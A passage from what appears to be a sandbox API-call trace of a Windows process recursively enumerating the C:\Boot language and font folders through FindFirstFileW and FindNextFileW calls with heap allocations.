lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728248 [0156.958] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.958] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.958] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.958] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.959] FindClose (in: hFindFile=0x728248 | out: hFindFile=0x728248) returned 1 [0156.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.959] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="es-MX", cAlternateFileName="")) returned 1 [0156.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.959] FindFirstFileW (in: lpFileName="C:\\Boot\\es-MX\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727e08 [0156.960] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.960] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.960] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.960] FindClose (in: hFindFile=0x727e08 | out: hFindFile=0x727e08) returned 1 [0156.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.961] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="et-EE", cAlternateFileName="")) returned 1 [0156.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.961] FindFirstFileW (in: lpFileName="C:\\Boot\\et-EE\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727f08 [0156.961] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.961] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.961] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.961] FindClose (in: hFindFile=0x727f08 | out: hFindFile=0x727f08) returned 1 [0156.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.962] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0156.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.962] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7280c8 [0156.963] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.963] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.963] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.963] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.963] FindClose (in: hFindFile=0x7280c8 | out: hFindFile=0x7280c8) returned 1 [0156.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.963] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Fonts", cAlternateFileName="")) returned 1 [0156.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.963] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728348 [0156.967] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.967] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef782dd9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x386467, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0156.967] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a1dbea, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef81cc08, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0156.968] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a902c2, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8771a7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1e4d4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0156.968] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b4eed5, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8c4060, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x243588, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0156.968] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8e28b4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2ab6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0156.968] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8f4db4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2b506, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0156.969] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9072c7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2318a, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0156.969] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef918492, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2380b, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0156.969] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef92a947, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x27a1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0156.969] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef93ce3b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x281fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0156.969] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef94dfcd, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x25b3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0156.970] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef95f141, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x26255, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0156.970] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef96ef3e, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0156.970] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c0da69, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef97d9ab, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x14f66, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0156.970] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef98c419, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x150a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0156.970] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0156.970] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0156.970] FindClose (in: hFindFile=0x728348 | out: hFindFile=0x728348) returned 1 [0156.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.971] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0156.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.971] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-CA\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728288 [0156.972] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.972] FindNextFileW (in: hFindFile=0x728288, 